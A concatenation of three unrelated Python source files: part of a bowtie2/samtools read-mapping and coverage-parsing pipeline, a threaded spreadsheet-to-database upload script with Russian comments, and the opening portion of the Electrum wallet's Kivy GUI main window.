'python {}/sipprcommon/editsamheaders.py'.format(self.homepath),
# Use samtools wrapper to set up the samtools view
SamtoolsViewCommandline(b=True,
S=True,
h=True,
input_file="-"),
samsort]
# print([samtools])
# Add custom parameters to a dictionary to be used in the bowtie2 alignment wrapper
indict = {'--very-sensitive-local': True,
# For short targets, the match bonus can be increased
'--ma': self.matchbonus,
'-U': sample[self.analysistype].baitedfastq,
'-a': True,
'--threads': self.threads,
'--local': True}
# Create the bowtie2 reference mapping command
bowtie2align = Bowtie2CommandLine(bt2=sample[self.analysistype].baitfilenoext,
threads=self.threads,
samtools=samtools,
**indict)
# Create the command to faidx index the bait file
sample[self.analysistype].faifile = sample[self.analysistype].baitfile + '.fai'
samindex = SamtoolsFaidxCommandline(reference=sample[self.analysistype].baitfile)
# Add the commands (as strings) to the metadata
sample[self.analysistype].samindex = str(samindex)
# Add the commands to the queue. Note that the commands would usually be set as attributes of the sample
# but there was an issue with their serialization when printing out the metadata
if not os.path.isfile(sample[self.analysistype].baitfilenoext + '.1' + self.bowtiebuildextension):
stdoutbowtieindex, stderrbowtieindex = map(StringIO,
bowtie2build(cwd=sample[self.analysistype].targetpath))
# Write any error to a log file
if stderrbowtieindex:
# Write the standard error to log, bowtie2 puts alignment summary here
with open(os.path.join(sample[self.analysistype].targetpath,
'{}_bowtie_index.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr(bowtie2build, stderrbowtieindex.getvalue(),
stdoutbowtieindex.getvalue()))
# Close the stdout and stderr streams
stdoutbowtieindex.close()
stderrbowtieindex.close()
self.mapqueue.put((sample, bowtie2build, bowtie2align, samindex))
self.mapqueue.join()
# Use samtools to index the sorted bam file
self.indexing()
def map(self):
while True:
# Get the necessary values from the queue
sample, bowtie2build, bowtie2align, samindex = self.mapqueue.get()
# Use samtools faidx to index the bait file - this will be used in the sample parsing
if not os.path.isfile(sample[self.analysistype].faifile):
stdoutindex, stderrindex = map(StringIO, samindex(cwd=sample[self.analysistype].targetpath))
# Write any error to a log file
if stderrindex:
# Write the standard error to log, bowtie2 puts alignment summary here
with open(os.path.join(sample[self.analysistype].targetpath,
'{}_samtools_index.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr(samindex, stderrindex.getvalue(), stdoutindex.getvalue()))
# Close the stdout and stderr streams
stdoutindex.close()
stderrindex.close()
# Only run the functions if the sorted bam files and the indexed bait file do not exist
if not os.path.isfile(sample[self.analysistype].sortedbam):
# Set stdout to a stringIO stream
stdout, stderr = map(StringIO, bowtie2align(cwd=sample[self.analysistype].outputdir))
if stderr:
# Write the standard error to log, bowtie2 puts alignment summary here
with open(os.path.join(sample[self.analysistype].outputdir,
'{}_bowtie_samtools.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr([bowtie2align], stderr.getvalue(), stdout.getvalue()))
stdout.close()
stderr.close()
self.mapqueue.task_done()
def indexing(self):
printtime('Indexing sorted bam files', self.start)
for i in range(len(self.runmetadata)):
# Send the threads to
threads = Thread(target=self.index, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
bamindex = SamtoolsIndexCommandline(input=sample[self.analysistype].sortedbam)
sample[self.analysistype].sortedbai = sample[self.analysistype].sortedbam + '.bai'
sample[self.analysistype].bamindex = str(bamindex)
self.indexqueue.put((sample, bamindex))
self.indexqueue.join()
# Parse the results
self.parsing()
def index(self):
while True:
sample, bamindex = self.indexqueue.get()
# Only make the call if the .bai file doesn't already exist
if not os.path.isfile(sample[self.analysistype].sortedbai):
# Use cStringIO streams to handle bowtie output
stdout, stderr = map(StringIO, bamindex(cwd=sample[self.analysistype].outputdir))
if stderr:
# Write the standard error to log
with open(os.path.join(sample[self.analysistype].outputdir,
'{}_samtools_bam_index.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr(bamindex, stderr.getvalue(), stdout.getvalue()))
stderr.close()
self.indexqueue.task_done()
def parsing(self):
printtime('Parsing sorted bam files', self.start)
for i in range(len(self.runmetadata)):
# Send the threads to
threads = Thread(target=self.parse, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Get the fai file into a dictionary to be used in parsing results
with open(sample[self.analysistype].faifile, 'r') as faifile:
for line in faifile:
data = line.split('\t')
try:
sample[self.analysistype].faidict[data[0]] = int(data[1])
except KeyError:
sample[self.analysistype].faidict = dict()
sample[self.analysistype].faidict[data[0]] = int(data[1])
self.parsequeue.put(sample)
self.parsequeue.join()
def parse(self):
import pysamstats
import operator
import numpy
while True:
sample = self.parsequeue.get()
# Initialise dictionaries to store parsed data
matchdict = dict()
depthdict = dict()
seqdict = dict()
snpdict = dict()
gapdict = dict()
maxdict = dict()
mindict = dict()
deviationdict = dict()
sample[self.analysistype].results = dict()
sample[self.analysistype].avgdepth = dict()
sample[self.analysistype].resultssnp = dict()
sample[self.analysistype].resultsgap = dict()
sample[self.analysistype].sequences = dict()
sample[self.analysistype].maxcoverage = dict()
sample[self.analysistype].mincoverage = dict()
sample[self.analysistype].standarddev = dict()
# Variable to store the expected position in gene/allele
pos = 0
try:
# Use the stat_variation function of pysam stats to return records parsed from sorted bam files
# Values of interest can be retrieved using the appropriate keys
for rec in pysamstats.stat_variation(alignmentfile=sample[self.analysistype].sortedbam,
fafile=sample[self.analysistype].baitfile,
max_depth=1000000):
# Initialise seqdict with the current gene/allele if necessary with an empty string
if rec['chrom'] not in seqdict:
seqdict[rec['chrom']] = str()
# Since this is the first position in a "new" gene/allele, reset the pos variable to 0
pos = 0
# Initialise gap dict with 0 gaps
if rec['chrom'] not in gapdict:
gapdict[rec['chrom']] = 0
# If there is a gap in the alignment, record the size of the gap in gapdict
if int(rec['pos']) > pos:
# Add the gap size to gap dict
gapdict[rec['chrom']] += rec['pos'] - pos
# Set the expected position to the current position
pos = int(rec['pos'])
# Increment pos in preparation for the next iteration
pos += 1
# Initialise snpdict if necessary
if rec['chrom'] not in snpdict:
snpdict[rec['chrom']] = 0
# Initialise the current gene/allele in depthdict with the depth (reads_all) if necessary,
# otherwise add the current depth to the running total
if rec['chrom'] not in depthdict:
depthdict[rec['chrom']] = int(rec['reads_all'])
else:
depthdict[rec['chrom']] += int(rec['reads_all'])
# Dictionary of bases and the number of times each base was observed per position
bases = {'A': rec['A'], 'C': rec['C'], 'G': rec['G'], 'T': rec['T']}
# If the most prevalent base (calculated with max() and operator.itemgetter()) does not match the
# reference base, add this prevalent base to seqdict
if max(bases.items(), key=operator.itemgetter(1))[0] != rec['ref']:
seqdict[rec['chrom']] += max(bases.items(), key=operator.itemgetter(1))[0]
# Increment the running total of the number of SNPs
snpdict[rec['chrom']] += 1
else:
# If the bases match, add the reference base to seqdict
seqdict[rec['chrom']] += (rec['ref'])
# Initialise posdict if necessary, otherwise, increment the running total of matches
if rec['chrom'] not in matchdict:
matchdict[rec['chrom']] = 1
else:
matchdict[rec['chrom']] += 1
# Find the max and min coverage for each strain/gene combo
try:
maxdict[rec['chrom']] = int(rec['reads_all']) if \
int(rec['reads_all']) >= maxdict[rec['chrom']] else maxdict[rec['chrom']]
except KeyError:
maxdict[rec['chrom']] = int(rec['reads_all'])
try:
mindict[rec['chrom']] = int(rec['reads_all']) if \
int(rec['reads_all']) <= mindict[rec['chrom']] else mindict[rec['chrom']]
except KeyError:
mindict[rec['chrom']] = int(rec['reads_all'])
# Create a list of all the depths in order to calculate the standard deviation
try:
deviationdict[rec['chrom']].append(int(rec['reads_all']))
except KeyError:
deviationdict[rec['chrom']] = list()
deviationdict[rec['chrom']].append(int(rec['reads_all']))
# If there are no results in the bam file, then pass over the strain
except ValueError:
pass
# Iterate through all the genes/alleles with results above
for allele in sorted(matchdict):
# If the length of the match is greater or equal to the length of the gene/allele (multiplied by the
# cutoff value) as determined using faidx indexing, then proceed
if matchdict[allele] >= sample[self.analysistype].faidict[allele] * self.cutoff:
# Calculate the average depth by dividing the total number of reads observed by the
# length of the gene
averagedepth = float(depthdict[allele]) / float(matchdict[allele])
percentidentity = float(matchdict[allele]) / float(sample[self.analysistype].faidict[allele]) * 100
# Only report a positive result if this average depth is greater than 10X
if averagedepth > 10:
# Populate resultsdict with the gene/allele name, the percent identity, and the average depth
sample[self.analysistype].results.update({allele: '{:.2f}'.format(percentidentity)})
sample[self.analysistype].avgdepth.update({allele: '{:.2f}'.format(averagedepth)})
# Add the SNP and gap results to dictionaries
sample[self.analysistype].resultssnp.update({allele: snpdict[allele]})
sample[self.analysistype].resultsgap.update({allele: gapdict[allele]})
sample[self.analysistype].sequences.update({allele: seqdict[allele]})
sample[self.analysistype].maxcoverage.update({allele: maxdict[allele]})
sample[self.analysistype].mincoverage.update({allele: mindict[allele]})
sample[self.analysistype]\
.standarddev.update({allele: '{:.2f}'.format(numpy.std(deviationdict[allele], ddof=1))})
self.parsequeue.task_done()
# noinspection PyDefaultArgument
def __init__(self, inputobject, cutoff=0.98, matchbonus=2, builddict=dict(), extension='.bt2'):
from queue import Queue
self.path = inputobject.path
self.sequencepath = inputobject.sequencepath
self.targetpath = inputobject.targetpath
self.reportpath = inputobject.reportpath
self.runmetadata = inputobject.runmetadata.samples
self.start = inputobject.starttime
self.analysistype = inputobject.analysistype
self.cpus = inputobject.cpus
self.threads = inputobject.threads
self.pipeline = inputobject.pipeline
self.homepath = inputobject.homepath
self.taxonomy = inputobject.taxonomy
self.cutoff = cutoff
self.matchbonus = matchbonus
self.builddict = builddict
self.bowtiebuildextension = extension
self.baitfile = str()
self.hashfile = str()
self.hashcall = str()
self.devnull = open(os.devnull, 'wb') # define /dev/null
self.baitqueue = Queue(maxsize=self.cpus)
self.mapqueue = Queue(maxsize=self.cpus)
self.indexqueue = Queue(maxsize=self.cpus)
self.parsequeue = Queue(maxsize=self.cpus)
# Run the analyses
self.targets()
# Print the metadata
printer = MetadataPrinter(self)
printer.printmetadata()
|
th_main.py
|
""" Это реализация парсинга, в которой загрузка в базу данных делается отдельным тредом.
Выигрыш во времени на удаленной БД - примерно 40%
Пробовал и параллелить сам парсинг с помощью тред пула - выигрыша во времени нет
"""
import logging
import threading
from main import upload_batch, get_filenames, startdir, XlsIterator, upload_df, show_1265_warnings
from db import open_db, close_db
from queue import Queue
def upload_worker(queue: Queue):
cur, conn = open_db()
print('Worker started, waiting for data...')
SQL, batch = queue.get()
fname = batch[0]['bkf_filename'] if batch else None
print(f'WORKER: Uploading {fname} to DB....')
while batch:
old_fname = fname
fname = batch[0]['bkf_filename']
if fname != old_fname:
print(f'WORKER: Uploading {fname} to DB....')
warnings_ = upload_batch(SQL, batch, cur, conn)
SQL, batch = queue.get()
show_1265_warnings(warnings_)
close_db(cur, conn)
if __name__ == "__main__":
import time
t1 = time.time()
print('Getting filenames...')
filenames = get_filenames(startdir)
print('Initializing parser')
walkall = XlsIterator(filenames, 0)
# Создаем очередь для батчей загрузки в бд, ее будет разбирать отдельный тред
batch_queue = Queue()
upload_thread = threading.Thread(target=upload_worker, args=(batch_queue,))
upload_thread.daemon = True
print('Start upload to db thread...')
upload_thread.start()
for df in walkall:
upload_df(df, batch_queue)
print('Кладем пустой batch')
batch_queue.put(('', []))
upload_thread.join()
t2 = time.time()
print('Время выполнения', t2-t1)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units, NoDynamicFeeEstimates
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
amount = tx.output_value()
